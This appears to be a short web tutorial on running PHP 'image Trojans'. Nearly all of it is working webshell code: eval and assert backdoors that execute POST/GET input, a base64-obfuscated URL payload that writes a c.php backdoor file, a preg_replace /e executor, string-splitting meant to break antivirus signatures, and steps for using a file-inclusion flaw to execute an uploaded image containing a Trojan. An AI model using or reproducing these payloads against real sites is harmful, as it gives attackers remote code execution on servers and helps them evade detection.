Home>Article>Backend Development> How to run php image Trojan
How to run PHP image Trojan
1. Standard writing method, execute PHP code directly through eval
@eval ($_POST['code']);
2. Dynamically execute assert to generate a Trojan horse file (the best hidden one)
@$_GET['a']($_GET['code']);
3. Usage method: from url After passing in the following parameters, a c.php file will be generated in the current directory.
/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29, base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
When a parameter is eval, an error will be reported (because eval is not a function). The Trojan generation fails and it is assert. The same error will be reported, but a Trojan will be generated.
4. Use preg_replace to execute the code (just use any string in front of it. If it is different, the command may be executed multiple times)
@preg_replace("/re/e", $_POST['code'], "re");
5. Break up the signatures
session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
6. Rename any file
$reg="c"."o"."p"."y"; $reg($_FILES['filename']['tmp_name'],$_FILES['filename']['name']);
How to use the include vulnerability
Sometimes we upload some image Trojans but they cannot be executed. If there is an include vulnerability, then the image Trojans can be executed.
If there is an include($_GET['controller']) in the php code and there is a url path: /index.php?controller=user, this seems to be a corresponding control executed based on parameter inclusion. The code of the server, but if the parameters in the url path are changed to this: /index.php?uid=/upload/images/muma.jpg, the Trojan will be executed at this time.
The above content is for reference only!
Recommended tutorial:PHP video tutorial
The above is the detailed content of How to run php image Trojan. For more information, please follow other related articles on the PHP Chinese website!